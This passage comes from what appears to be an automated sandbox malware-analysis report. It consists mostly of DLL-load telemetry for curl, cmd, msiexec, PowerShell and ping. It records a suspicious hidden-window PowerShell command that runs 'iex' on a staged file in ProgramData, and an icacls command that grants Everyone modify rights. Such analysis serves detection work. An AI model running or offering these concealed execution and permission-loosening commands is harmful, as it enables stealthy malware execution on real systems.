Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_021BA21B push ecx; ret 2_2_021BA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_021BA20A push ecx; ret 2_2_021BA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_021BBB67 push 00000000h; mov dword ptr [esp], esp2_2_021BBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_021BB3B7 push 00000000h; mov dword ptr [esp], esp2_2_021BB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_021BB947 push 00000000h; mov dword ptr [esp], esp2_2_021BB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_021BC477 push 00000000h; mov dword ptr [esp], esp2_2_021BC49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
